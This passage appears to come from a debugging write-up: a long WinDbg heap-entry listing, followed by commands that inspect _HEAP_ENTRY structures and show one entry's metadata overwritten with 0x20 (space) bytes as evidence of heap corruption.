00a27590: 00178 . 00168 [01] – busy (160)
00a276f8: 00168 . 00178 [01] – busy (16c)
00a27870: 00178 . 00170 [01] – busy (164)
00a279e0: 00170 . 00180 [01] – busy (174)
00a27b60: 00180 . 00168 [01] – busy (15c)
00a27cc8: 00168 . 00168 [01] – busy (15c)
00a27e30: 00168 . 00178 [01] – busy (16c)
00a27fa8: 00178 . 00168 [01] – busy (160)
00a28110: 00168 . 00118 [01] – busy (10c)
00a28228: 00118 . 00130 [01] – busy (121)
00a28358: 00130 . 001f8 [01] – busy (1eb)
00a28550: 001f8 . 001c0 [01] – busy (1b2)
00a28710: 001c0 . 00150 [01] – busy (144)
00a28860: 00150 . 00188 [01] – busy (17d)
00a289e8: 00188 . 00280 [01] – busy (278)
00a28c68: 00280 . 002b0 [01] – busy (2a4)
00a28f18: 002b0 . 00020 [01] – busy (18)
00a28f38: 00020 . 000f0 [01] – busy (e8)
00a29028: 000f0 . 001e0 [01] – busy (1d8)
00a29208: 001e0 . 000c8 [01] – busy (c0)
00a292d0: 000c8 . 00298 [01] – busy (290)
00a29568: 00298 . 00178 [01] – busy (170)
00a296e0: 00178 . 00608 [01] – busy (600)
00a29ce8: 00608 . 001c0 [01] – busy (1b4)
00a29ea8: 001c0 . 00110 [01] – busy (104)
00a29fb8: 00110 . 00128 [01] – busy (11c)
00a2a0e0: 00128 . 00140 [01] – busy (134)
00a2a220: 00140 . 00020 [01] – busy (14)
00a2a240: 00020 . 00608 [01] – busy (600)
00a2a848: 00608 . 00170 [01] – busy (164)
00a2a9b8: 00170 . 00138 [01] – busy (12c)
00a2aaf0: 00138 . 00028 [01] – busy (20)
00a2ab18: 00028 . 001e0 [01] – busy (1d8)
00a2acf8: 001e0 . 00188 [01] – busy (180)
00a2ae80: 00188 . 000c8 [01] – busy (c0)
00a2af48: 000c8 . 00098 [00]
00a2afe0: 00098 . 001e0 [01] – busy (1d8)
00a2b1c0: 001e0 . 00188 [01] – busy (180)
00a2b348: 00188 . 000c8 [01] – busy (c0)
00a2b410: 000c8 . 00098 [01] – busy (8c)
00a2b4a8: 00098 . 001e0 [01] – busy (1d8)
00a2b688: 001e0 . 00188 [01] – busy (180)
00a2b810: 00188 . 000c8 [01] – busy (c0)
00a2b8d8: 000c8 . 00098 [01] – busy (88)
00a2b970: 00098 . 001e0 [01] – busy (1d8)
00a2bb50: 001e0 . 00188 [01] – busy (180)
00a2bcd8: 00188 . 000c8 [01] – busy (c0)
00a2bda0: 000c8 . 00098 [01] – busy (84)
00a2be38: 00098 . 00188 [01] – busy (180)
00a2bfc0: 00188 . 001e0 [01] – busy (1d8)
00a2c1a0: 001e0 . 00308 [01] – busy (300)
00a2c4a8: 00308 . 00178 [01] – busy (169)
00a2c620: 00178 . 00168 [01] – busy (160)
00a2c788: 00168 . 000c8 [01] – busy (c0)
00a2c850: 000c8 . 00088 [01] – busy (80)
00a2c8d8: 00088 . 00010 [01] – busy (4)
00a2c8e8: 00010 . 001e0 [01] – busy (1d8)
00a2cac8: 001e0 . 00188 [01] – busy (180)
00a2cc50: 00188 . 00188 [01] – busy (180)
00a2cdd8: 00188 . 00608 [01] – busy (600)
00a2d3e0: 00608 . 001e0 [01] – busy (1d8)
00a2d5c0: 001e0 . 00160 [01] – busy (158)
00a2d720: 00160 . 00188 [01] – busy (180)
00a2d8a8: 00188 . 001e0 [01] – busy (1d8)
00a2da88: 001e0 . 00188 [01] – busy (180)
00a2dc10: 00188 . 00160 [01] – busy (157)
00a2dd70: 00160 . 001e0 [01] – busy (1d8)
00a2df50: 001e0 . 00188 [01] – busy (180)
00a2e0d8: 00188 . 00160 [01] – busy (158)
00a2e238: 00160 . 001e0 [01] – busy (1d8)
00a2e418: 001e0 . 00188 [01] – busy (180)
00a2e5a0: 00188 . 00168 [01] – busy (15c)
00a2e708: 00168 . 00188 [01] – busy (180)
00a2e890: 00188 . 00178 [01] – busy (170)
00a2ea08: 00178 . 00168 [01] – busy (160)
00a2eb70: 00168 . 00188 [01] – busy (180)
00a2ecf8: 00188 . 00608 [01] – busy (600)
00a2f300: 00608 . 001b8 [01] – busy (1b0)
00a2f4b8: 001b8 . 00168 [01] – busy (15c)
00a2f620: 00168 . 00170 [01] – busy (164)
00a2f790: 00170 . 00168 [01] – busy (15c)
00a2f8f8: 00168 . 001d0 [01] – busy (1c7)
00a2fac8: 001d0 . 00120 [01] – busy (113)
00a2fbe8: 00120 . 00018 [01] – busy (10)
00a2fc00: 00018 . 00268 [01] – busy (25c)
00a2fe68: 00268 . 00128 [01] – busy (120)
00a2ff90: 00128 . 00248 [01] – busy (240)
00a301d8: 00248 . 00198 [01] – busy (18f)
00a30370: 00198 . 00210 [01] – busy (204)
00a30580: 00210 . 00048 [01] – busy (40)
00a305c8: 00048 . 00350 [01] – busy (344)
00a30918: 00350 . 00288 [01] – busy (27e)
00a30ba0: 00288 . 00180 [01] – busy (176)
00a30d20: 00180 . 00108 [01] – busy (100)
00a30e28: 00108 . 00058 [01] – busy (48)
00a30e80: 00058 . 00160 [01] – busy (158)
00a30fe0: 00160 . 00030 [01] – busy (24)
00a31010: 00030 . 00160 [01] – busy (158)
00a31170: 00160 . 001e0 [01] – busy (1d8)
00a31350: 001e0 . 00188 [01] – busy (180)
00a314d8: 00188 . 001e0 [01] – busy (1d8)
00a316b8: 001e0 . 00160 [01] – busy (154)
00a31818: 00160 . 001e0 [01] – busy (1d8)
00a319f8: 001e0 . 00188 [01] – busy (180)
00a31b80: 00188 . 00160 [01] – busy (158)
00a31ce0: 00160 . 001e0 [01] – busy (1d8)
00a31ec0: 001e0 . 00608 [01] – busy (600)
00a324c8: 00608 . 00190 [01] – busy (188)
00a32658: 00190 . 00608 [01] – busy (600)
00a32c60: 00608 . 00608 [01] – busy (600)
00a33268: 00608 . 001e0 [01] – busy (1d8)
00a33448: 001e0 . 001e0 [01] – busy (1d8)
00a33628: 001e0 . 00170 [01] – busy (164)
00a33798: 00170 . 00170 [01] – busy (164)
00a33908: 00170 . 00170 [01] – busy (168)
00a33a78: 00170 . 00170 [01] – busy (168)
00a33be8: 00170 . 00168 [01] – busy (160)
00a33d50: 00168 . 00170 [01] – busy (164)
00a33ec0: 00170 . 00178 [01] – busy (16c)
00a34038: 00178 . 00188 [01] – busy (180)
00a341c0: 00188 . 00188 [01] – busy (180)
00a34348: 00188 . 00188 [01] – busy (180)
00a344d0: 00188 . 00188 [01] – busy (180)
00a34658: 00188 . 00170 [01] – busy (164)
00a347c8: 00170 . 00170 [01] – busy (168)
00a34938: 00170 . 00168 [01] – busy (15c)
00a34aa0: 00168 . 00170 [01] – busy (168)
00a34c10: 00170 . 00160 [01] – busy (158)
00a34d70: 00160 . 00260 [01] – busy (251)
00a34fd0: 00260 . 00b60 [01] – busy (b53)
00a35b30: 00b60 . 003b8 [01] – busy (3ad)
00a35ee8: 003b8 . 000c8 [01] – busy (c0)
00a35fb0: 000c8 . 00198 [01] – busy (190)
00a36148: 00198 . 001f8 [01] – busy (1ec)
00a36340: 001f8 . 00168 [01] – busy (160)
00a364a8: 00168 . 00170 [01] – busy (168)
00a36618: 00170 . 001d0 [01] – busy (1c4)
00a367e8: 001d0 . 00198 [01] – busy (190)
00a36980: 00198 . 001b8 [01] – busy (1b0)
00a36b38: 001b8 . 00168 [01] – busy (15c)
00a36ca0: 00168 . 00178 [01] – busy (16c)
00a36e18: 00178 . 00170 [01] – busy (164)
00a36f88: 00170 . 00180 [01] – busy (174)
00a37108: 00180 . 00178 [01] – busy (170)
00a37280: 00178 . 00180 [01] – busy (178)
00a37400: 00180 . 00178 [01] – busy (16c)
00a37578: 00178 . 00170 [01] – busy (164)
00a376e8: 00170 . 00168 [01] – busy (15c)
00a37850: 00168 . 00188 [01] – busy (17c)
00a379d8: 00188 . 00170 [01] – busy (164)
00a37b48: 00170 . 00190 [01] – busy (184)
00a37cd8: 00190 . 00160 [01] – busy (158)
00a37e38: 00160 . 003a0 [01] – busy (398)
00a381d8: 003a0 . 002b0 [01] – busy (2a4)
00a38488: 002b0 . 002a8 [01] – busy (29c)
00a38730: 002a8 . 002a8 [01] – busy (29c)
00a389d8: 002a8 . 00248 [01] – busy (23c)
00a38c20: 00248 . 00248 [01] – busy (23c)
00a38e68: 00248 . 00138 [01] – busy (12c)
00a38fa0: 00138 . 00048 [01] – busy (3a)
00a38fe8: 00048 . 00018 [00]
00a39000: 00018 . 00178 [01] – busy (16f)
00a39178: 00178 . 00188 [01] – busy (180)
00a39300: 00188 . 00110 [01] – busy (108)
00a39410: 00110 . 00188 [01] – busy (180)
00a39598: 00188 . 00138 [01] – busy (12d)
00a396d0: 00138 . 00180 [01] – busy (174)
00a39850: 00180 . 00010 [01] – busy (4)
00a39860: 00010 . 00010 [01] – busy (4)
00a39870: 00010 . 00168 [01] – busy (15c)
00a399d8: 00168 . 18008 [01] – busy (18000)
00a519e0: 18008 . 002c0 [01] – busy (2b4)
00a51ca0: 002c0 . 00368 [01] – busy (35d)
00a52008: 00368 . 00198 [01] – busy (18e)
00a521a0: 00198 . 00330 [01] – busy (324)
00a524d0: 00330 . 00488 [01] – busy (47c)
00a52958: 00488 . 003c8 [01] – busy (3c0)
00a52d20: 003c8 . 00608 [01] – busy (600)
00a53328: 00608 . 001d8 [01] – busy (1c9)
00a53500: 001d8 . 00188 [01] – busy (180)
00a53688: 00188 . 001e0 [01] – busy (1d8)
00a53868: 001e0 . 00108 [01] – busy (100)
00a53970: 00108 . 00108 [01] – busy (100)
00a53a78: 00108 . 00108 [01] – busy (100)
00a53b80: 00108 . 00160 [01] – busy (158)
00a53ce0: 00160 . 00190 [01] – busy (180)
00a53e70: 00190 . 00178 [01] – busy (16c)
00a53fe8: 00178 . 00188 [01] – busy (180)
00a54170: 00188 . 00180 [01] – busy (174)
00a542f0: 00180 . 00028 [01] – busy (20)
00a54318: 00028 . 00018 [01] – busy (10)
00a54330: 00018 . 01300 [01] – busy (12f7)
00a55630: 01300 . 00818 [01] – busy (809)
00a55e48: 00818 . 001b0 [01] – busy (1a8)
00a55ff8: 001b0 . 00288 [01] – busy (27b)
00a56280: 00288 . 00488 [01] – busy (47e)
00a56708: 00488 . 00188 [01] – busy (180)
00a56890: 00188 . 00188 [01] – busy (180)
00a56a18: 00188 . 00188 [01] – busy (180)
00a56ba0: 00188 . 00188 [01] – busy (180)
00a56d28: 00188 . 00188 [01] – busy (17c)
00a56eb0: 00188 . 00128 [01] – busy (120)
00a56fd8: 00128 . 00010 [01] – busy (8)
00a56fe8: 00010 . 001b8 [01] – busy (1b0)
00a571a0: 001b8 . 00188 [01] – busy (180)
00a57328: 00188 . 00188 [01] – busy (180)
00a574b0: 00188 . 00608 [01] – busy (600)
00a57ab8: 00608 . 00170 [01] – busy (161)
00a57c28: 00170 . 001e0 [01] – busy (1d8)
00a57e08: 001e0 . 00188 [01] – busy (180)
00a57f90: 00188 . 00048 [01] – busy (40)
00a57fd8: 00048 . 00018 [00]
00a57ff0: 00018 . 003e8 [01] – busy (3dc)
00a583d8: 003e8 . 00188 [01] – busy (17c)
00a58560: 00188 . 00450 [01] – busy (441)
00a589b0: 00450 . 000c8 [01] – busy (c0)
00a58a78: 000c8 . 00010 [01] – busy (8)
00a58a88: 00010 . 00010 [01] – busy (4)
00a58a98: 00010 . 003e8 [01] – busy (3dc)
00a58e80: 003e8 . 00120 [01] – busy (114)
00a58fa0: 00120 . 00010 [01] – busy (8)
00a58fb0: 00010 . 00040 [00]
00a58ff0: 00040 . 00170 [01] – busy (164)
00a59160: 00170 . 00288 [01] – busy (280)
00a593e8: 00288 . 00188 [01] – busy (180)
00a59570: 00188 . 00168 [01] – busy (15c)
00a596d8: 00168 . 00170 [01] – busy (164)
00a59848: 00170 . 001e0 [01] – busy (1d8)
00a59a28: 001e0 . 00050 [01] – busy (40)
00a59a78: 00050 . 00190 [01] – busy (188)
00a59c08: 00190 . 00190 [01] – busy (185)
00a59d98: 00190 . 00178 [01] – busy (16c)
00a59f10: 00178 . 00170 [01] – busy (168)
00a5a080: 00170 . 00160 [01] – busy (154)
00a5a1e0: 00160 . 00178 [01] – busy (170)
00a5a358: 00178 . 003e8 [01] – busy (3dc)
00a5a740: 003e8 . 001d0 [01] – busy (1c7)
00a5a910: 001d0 . 00160 [01] – busy (157)
00a5aa70: 00160 . 001b0 [01] – busy (1a8)
00a5ac20: 001b0 . 00188 [01] – busy (17e)
00a5ada8: 00188 . 00210 [01] – busy (202)
00a5afb8: 00210 . 00050 [01] – busy (40)
00a5b008: 00050 . 00240 [01] – busy (238)
00a5b248: 00240 . 002a8 [01] – busy (29c)
00a5b4f0: 002a8 . 00248 [01] – busy (23c)
00a5b738: 00248 . 00278 [01] – busy (270)
00a5b9b0: 00278 . 002a8 [01] – busy (29c)
00a5bc58: 002a8 . 00278 [01] – busy (270)
00a5bed0: 00278 . 00248 [01] – busy (23c)
00a5c118: 00248 . 00278 [01] – busy (270)
00a5c390: 00278 . 00278 [01] – busy (270)
00a5c608: 00278 . 00248 [01] – busy (23c)
00a5c850: 00248 . 00248 [01] – busy (23c)
00a5ca98: 00248 . 00248 [01] – busy (23c)
00a5cce0: 00248 . 00248 [01] – busy (23c)
00a5cf28: 00248 . 00248 [01] – busy (23c)
00a5d170: 00248 . 00248 [01] – busy (23c)
00a5d3b8: 00248 . 001a0 [01] – busy (194)
00a5d558: 001a0 . 00248 [01] – busy (23c)
00a5d7a0: 00248 . 00248 [01] – busy (23c)
00a5d9e8: 00248 . 00248 [01] – busy (23c)
00a5dc30: 00248 . 00248 [01] – busy (23c)
00a5de78: 00248 . 00248 [01] – busy (23c)
00a5e0c0: 00248 . 00248 [01] – busy (23c)
00a5e308: 00248 . 00248 [01] – busy (23c)
00a5e550: 00248 . 00248 [01] – busy (23c)
00a5e798: 00248 . 00248 [01] – busy (23c)
00a5e9e0: 00248 . 00248 [01] – busy (23c)
00a5ec28: 00248 . 002a8 [01] – busy (29c)
00a5eed0: 002a8 . 002a8 [01] – busy (29c)
00a5f178: 002a8 . 00248 [01] – busy (23c)
00a5f3c0: 00248 . 002a8 [01] – busy (29c)
00a5f668: 002a8 . 002a8 [01] – busy (29c)
00a5f910: 002a8 . 00248 [01] – busy (23c)
00a5fb58: 00248 . 00248 [01] – busy (23c)
00a5fda0: 00248 . 002a8 [01] – busy (29c)
00a60048: 002a8 . 002a8 [01] – busy (29c)
00a602f0: 002a8 . 002a8 [01] – busy (29c)
00a60598: 002a8 . 002a8 [01] – busy (29c)
00a60840: 002a8 . 002a8 [01] – busy (29c)
00a60ae8: 002a8 . 002a8 [01] – busy (29c)
00a60d90: 002a8 . 00248 [01] – busy (23c)
00a60fd8: 00248 . 002a8 [01] – busy (29c)
00a61280: 002a8 . 00248 [01] – busy (23c)
00a614c8: 00248 . 00248 [01] – busy (23c)
00a61710: 00248 . 00248 [01] – busy (23c)
00a61958: 00248 . 00248 [01] – busy (23c)
00a61ba0: 00248 . 002a8 [01] – busy (29c)
00a61e48: 002a8 . 00280 [01] – busy (278)
00a620c8: 00280 . 00280 [01] – busy (278)
00a62348: 00280 . 00248 [01] – busy (23c)
00a62590: 00248 . 00248 [01] – busy (23c)
00a627d8: 00248 . 00248 [01] – busy (23c)
00a62a20: 00248 . 00248 [01] – busy (23c)
00a62c68: 00248 . 00248 [01] – busy (23c)
00a62eb0: 00248 . 00248 [01] – busy (23c)
00a630f8: 00248 . 00248 [01] – busy (23c)
00a63340: 00248 . 00248 [01] – busy (23c)
00a63588: 00248 . 00248 [01] – busy (23c)
00a637d0: 00248 . 00248 [01] – busy (23c)
00a63a18: 00248 . 00248 [01] – busy (23c)
00a63c60: 00248 . 00248 [01] – busy (23c)
00a63ea8: 00248 . 00248 [01] – busy (23c)
00a640f0: 00248 . 00248 [01] – busy (23c)
00a64338: 00248 . 00248 [01] – busy (23c)
00a64580: 00248 . 00248 [01] – busy (23c)
00a647c8: 00248 . 00248 [01] – busy (23c)
00a64a10: 00248 . 00248 [01] – busy (23c)
00a64c58: 00248 . 00248 [01] – busy (23c)
00a64ea0: 00248 . 001c8 [01] – busy (1bc)
00a65068: 001c8 . 00248 [01] – busy (23c)
00a652b0: 00248 . 00248 [01] – busy (23c)
00a654f8: 00248 . 00248 [01] – busy (23c)
00a65740: 00248 . 00220 [01] – busy (218)
00a65960: 00220 . 00248 [01] – busy (23c)
00a65ba8: 00248 . 00248 [01] – busy (23c)
00a65df0: 00248 . 00278 [01] – busy (270)
00a66068: 00278 . 00248 [01] – busy (23c)
00a662b0: 00248 . 00248 [01] – busy (23c)
00a664f8: 00248 . 00248 [01] – busy (23c)
00a66740: 00248 . 00248 [01] – busy (23c)
00a66988: 00248 . 00118 [01] – busy (110)
00a66aa0: 00118 . 00248 [01] – busy (23c)
00a66ce8: 00248 . 00248 [01] – busy (23c)
00a66f30: 00248 . 00118 [01] – busy (110)
00a67048: 00118 . 00248 [01] – busy (23c)
00a67290: 00248 . 00248 [01] – busy (23c)
00a674d8: 00248 . 00220 [01] – busy (218)
00a676f8: 00220 . 00248 [01] – busy (23c)
00a67940: 00248 . 00248 [01] – busy (23c)
00a67b88: 00248 . 00248 [01] – busy (23c)
00a67dd0: 00248 . 00248 [01] – busy (23c)
00a68018: 00248 . 00248 [01] – busy (23c)
00a68260: 00248 . 00248 [01] – busy (23c)
00a684a8: 00248 . 00248 [01] – busy (23c)
00a686f0: 00248 . 00248 [01] – busy (23c)
00a68938: 00248 . 00248 [01] – busy (23c)
00a68b80: 00248 . 00248 [01] – busy (23c)
00a68dc8: 00248 . 00248 [01] – busy (23c)
00a69010: 00248 . 00248 [01] – busy (23c)
00a69258: 00248 . 00130 [01] – busy (128)
00a69388: 00130 . 00248 [01] – busy (23c)
00a695d0: 00248 . 00248 [01] – busy (23c)
00a69818: 00248 . 00118 [01] – busy (110)
00a69930: 00118 . 00248 [01] – busy (23c)
00a69b78: 00248 . 00248 [01] – busy (23c)
00a69dc0: 00248 . 00248 [01] – busy (23c)
00a6a008: 00248 . 002a8 [01] – busy (29c)
00a6a2b0: 002a8 . 00248 [01] – busy (23c)
00a6a4f8: 00248 . 00248 [01] – busy (23c)
00a6a740: 00248 . 00248 [01] – busy (23c)
00a6a988: 00248 . 00248 [01] – busy (23c)
00a6abd0: 00248 . 00248 [01] – busy (23c)
00a6ae18: 00248 . 00248 [01] – busy (23c)
00a6b060: 00248 . 00120 [01] – busy (118)
00a6b180: 00120 . 00248 [01] – busy (23c)
00a6b3c8: 00248 . 00248 [01] – busy (23c)
00a6b610: 00248 . 00248 [01] – busy (23c)
00a6b858: 00248 . 00248 [01] – busy (23c)
00a6baa0: 00248 . 00248 [01] – busy (23c)
00a6bce8: 00248 . 00248 [01] – busy (23c)
00a6bf30: 00248 . 00248 [01] – busy (23c)
00a6c178: 00248 . 00248 [01] – busy (23c)
00a6c3c0: 00248 . 00248 [01] – busy (23c)
00a6c608: 00248 . 00148 [01] – busy (140)
00a6c750: 00148 . 00160 [01] – busy (158)
00a6c8b0: 00160 . 02018 [01] – busy (2010)
00a6e8c8: 02018 . 01008 [01] – busy (1000)
00a6f8d0: 01008 . 00ad8 [00]
00a703a8: 00ad8 . 00120 [01] – busy (115)
00a704c8: 00120 . 00358 [01] – busy (34d)
00a70820: 00358 . 00188 [01] – busy (180)
00a709a8: 00188 . 00110 [01] – busy (104)
00a70ab8: 00110 . 00050 [01] – busy (40)
00a70b08: 00050 . 00358 [01] – busy (34c)
00a70e60: 00358 . 00168 [01] – busy (160)
00a70fc8: 00168 . 00118 [01] – busy (109)
00a710e0: 00118 . 001c8 [01] – busy (1c0)
00a712a8: 001c8 . 00168 [01] – busy (160)
00a71410: 00168 . 00210 [01] – busy (202)
00a71620: 00210 . 001e0 [01] – busy (1d8)
00a71800: 001e0 . 00188 [01] – busy (180)
00a71988: 00188 . 000f8 [00]
00a71a80: 000f8 . 01808 [01] – busy (1800)
00a73288: 01808 . 01808 [01] – busy (1800)
00a74a90: 01808 . 01808 [01] – busy (1800)
00a76298: 01808 . 00188 [01] – busy (180)
00a76420: 00188 . 00188 [01] – busy (180)
00a765a8: 00188 . 001e0 [01] – busy (1d8)
00a76788: 001e0 . 00308 [01] – busy (300)
00a76a90: 00308 . 00608 [01] – busy (600)
00a77098: 00608 . 00180 [01] – busy (178)
00a77218: 00180 . 00168 [01] – busy (160)
00a77380: 00168 . 00180 [01] – busy (178)
00a77500: 00180 . 00168 [01] – busy (15c)
00a77668: 00168 . 00198 [01] – busy (190)
00a77800: 00198 . 001f8 [01] – busy (1ec)
00a779f8: 001f8 . 00188 [01] – busy (17c)
00a77b80: 00188 . 00170 [01] – busy (164)
00a77cf0: 00170 . 00170 [01] – busy (168)
00a77e60: 00170 . 00178 [01] – busy (170)
00a77fd8: 00178 . 00198 [01] – busy (18c)
00a78170: 00198 . 001f8 [01] – busy (1ec)
00a78368: 001f8 . 00170 [01] – busy (164)
00a784d8: 00170 . 00170 [01] – busy (164)
00a78648: 00170 . 00168 [01] – busy (15c)
00a787b0: 00168 . 001b8 [01] – busy (1b0)
00a78968: 001b8 . 00180 [01] – busy (174)
00a78ae8: 00180 . 00188 [01] – busy (180)
00a78c70: 00188 . 00100 [00]
00a78d70: 00100 . 00180 [01] – busy (174)
00a78ef0: 00180 . 00608 [01] – busy (600)
00a794f8: 00608 . 00208 [01] – busy (200)
00a79700: 00208 . 00188 [01] – busy (180)
00a79888: 00188 . 00608 [01] – busy (600)
00a79e90: 00608 . 00308 [01] – busy (300)
00a7a198: 00308 . 00220 [01] – busy (214)
00a7a3b8: 00220 . 003f8 [00]
00a7a7b0: 003f8 . 003d0 [01] – busy (3c2)
00a7ab80: 003d0 . 00248 [01] – busy (240)
00a7adc8: 00248 . 00318 [01] – busy (30f)
00a7b0e0: 00318 . 00228 [01] – busy (21e)
00a7b308: 00228 . 00378 [01] – busy (370)
00a7b680: 00378 . 00168 [01] – busy (160)
00a7b7e8: 00168 . 00278 [01] – busy (270)
00a7ba60: 00278 . 001e0 [01] – busy (1d8)
00a7bc40: 001e0 . 00520 [01] – busy (518)
00a7c160: 00520 . 00268 [01] – busy (25e)
00a7c3c8: 00268 . 00178 [01] – busy (16f)
00a7c540: 00178 . 00120 [01] – busy (116)
00a7c660: 00120 . 00170 [01] – busy (167)
00a7c7d0: 00170 . 00268 [01] – busy (25a)
00a7ca38: 00268 . 003d8 [01] – busy (3cf)
00a7ce10: 003d8 . 004d0 [01] – busy (4c2)
00a7d2e0: 004d0 . 00408 [01] – busy (3fa)
00a7d6e8: 00408 . 00118 [01] – busy (10c)
00a7d800: 00118 . 00118 [01] – busy (10c)
00a7d918: 00118 . 001a0 [01] – busy (197)
00a7dab8: 001a0 . 00118 [01] – busy (10c)
00a7dbd0: 00118 . 00608 [01] – busy (600)
00a7e1d8: 00608 . 001e0 [01] – busy (1d8)
00a7e3b8: 001e0 . 00188 [01] – busy (17b)
00a7e540: 00188 . 00228 [01] – busy (21b)
00a7e768: 00228 . 00068 [01] – busy (5c)
00a7e7d0: 00068 . 00010 [01] – busy (4)
00a7e7e0: 00010 . 00160 [01] – busy (154)
00a7e940: 00160 . 00188 [01] – busy (180)
00a7eac8: 00188 . 00160 [01] – busy (158)
00a7ec28: 00160 . 00188 [01] – busy (180)
00a7edb0: 00188 . 00160 [01] – busy (154)
00a7ef10: 00160 . 00188 [01] – busy (180)
00a7f098: 00188 . 00c08 [01] – busy (c00)
00a7fca0: 00c08 . 001a8 [01] – busy (1a0)
00a7fe48: 001a8 . 00188 [01] – busy (180)
00a7ffd0: 00188 . 00018 [01] – busy (c)
00a7ffe8: 00018 . 00018 [11] – busy (c)
Segment02 at 00a80000:
Flags: 00000000
Base: 00a80000
First Entry: 00a80040
Last Entry: 00c80000
Total Pages: 00000200
Total UnCommit: 00000175
Largest UnCommit:00172000
UnCommitted Ranges: (2)
00acb000: 00003000
00b0e000: 00172000

Heap entries for Segment02 in Heap 00970000
00a80000: 00000 . 00040 [01] – busy (40)
00a80040: 00040 . 40008 [01] – busy (40000)
00ac0048: 40008 . 00170 [01] – busy (164)
00ac01b8: 00170 . 01808 [01] – busy (1800)
00ac19c0: 01808 . 00408 [01] – busy (400)
00ac1dc8: 00408 . 000c8 [01] – busy (c0)
00ac1e90: 000c8 . 000c8 [01] – busy (c0)
00ac1f58: 000c8 . 000a8 [01] – busy (93)
00ac2000: 000a8 . 03008 [01] – busy (3000)
00ac5008: 03008 . 00460 [01] – busy (453)
00ac5468: 00460 . 00190 [01] – busy (188)
00ac55f8: 00190 . 00188 [01] – busy (180)
00ac5780: 00188 . 00170 [01] – busy (164)
00ac58f0: 00170 . 00170 [01] – busy (164)
00ac5a60: 00170 . 000d0 [00]
00ac5b30: 000d0 . 001a0 [01] – busy (196)
00ac5cd0: 001a0 . 001e0 [01] – busy (1d8)
00ac5eb0: 001e0 . 05150 [10]
00acb000: 00003000 – uncommitted bytes.
00ace000: 00000 . 00018 [01] – busy (10)
00ace018: 00018 . 00018 [01] – busy (10)
00ace030: 00018 . 00198 [01] – busy (18f)
00ace1c8: 00198 . 001e8 [01] – busy (1d9)
00ace3b0: 001e8 . 00118 [01] – busy (10f)
00ace4c8: 00118 . 003f8 [01] – busy (3eb)
00ace8c0: 003f8 . 00168 [01] – busy (15a)
00acea28: 00168 . 003e8 [01] – busy (3dc)
00acee10: 003e8 . 001e0 [01] – busy (1d7)
00aceff0: 001e0 . 00130 [01] – busy (128)
00acf120: 00130 . 00030 [00]
00acf150: 00030 . 001e0 [01] – busy (1d8)
00acf330: 001e0 . 00160 [01] – busy (154)
00acf490: 00160 . 001e0 [01] – busy (1d8)
00acf670: 001e0 . 00160 [01] – busy (154)
00acf7d0: 00160 . 001e0 [01] – busy (1d8)
00acf9b0: 001e0 . 000c8 [01] – busy (c0)
00acfa78: 000c8 . 00160 [01] – busy (158)
00acfbd8: 00160 . 001e0 [01] – busy (1d8)
00acfdb8: 001e0 . 00188 [01] – busy (180)
00acff40: 00188 . 0c008 [01] – busy (c000)
00adbf48: 0c008 . 20020 [01] – busy (20015)
00afbf68: 20020 . 10020 [01] – busy (10015)
00b0bf88: 10100 . 10100 [20]
unable to read heap entry at 00b1c088

The error message shown by windbg “unable to read heap entry at..” partially confirms that its a sign of memory / heap corruption.

0:000> dt _HEAP_ENTRY 00adbf48
ntdll!_HEAP_ENTRY
+0x000 Size : 0x4004
+0x002 PreviousSize : 0x1801
+0x000 SubSegmentCode : 0x18014004
+0x004 SmallTagIndex : 0xc3 ”
+0x005 Flags : 0x1 ”
+0x006 UnusedBytes : 0xb ”
+0x007 SegmentIndex : 0x2 ”

0:000> dt _HEAP_ENTRY 00afbf68
ntdll!_HEAP_ENTRY
+0x000 Size : 0x2004
+0x002 PreviousSize : 0x4004
+0x000 SubSegmentCode : 0x40042004
+0x004 SmallTagIndex : 0xc7 ”
+0x005 Flags : 0x1 ”
+0x006 UnusedBytes : 0xb ”
+0x007 SegmentIndex : 0x2 ”

Above two entries actually make sense. size and previous size matches for both of them. Now lets dessect the last entry

0:000> dt _HEAP_ENTRY 00b0bf88
ntdll!_HEAP_ENTRY
+0x000 Size : 0x2020
+0x002 PreviousSize : 0x2020
+0x000 SubSegmentCode : 0x20202020
+0x004 SmallTagIndex : 0x20 ‘ ‘
+0x005 Flags : 0x20 ‘ ‘
+0x006 UnusedBytes : 0x20 ‘ ‘
+0x007 SegmentIndex : 0x20 ‘ ‘

From above windbg output, it can be seen that metadata of 0x00b0bf88 is completely corrupted and overwritten with 0x20s which is nothing but spaces.

0:000> dd 00b0bf88
00b0bf88 20202020 20202020 20202020 20202020
00b0bf98 20202020 20202020 20202020 20202020
00b0bfa8 20202020 20202020 20202020 20202020
00b0bfb8 20202020 20202020 20202020 20202020
00b0bfc8 20202020 20202020 20202020 20202020
00b0bfd8 20202020 20202020 20202020 20202020
00b0bfe8 20202020 20202020 20202020 20202020
00b0bff8 20202020 20202020 20202020 20202020

评论关闭。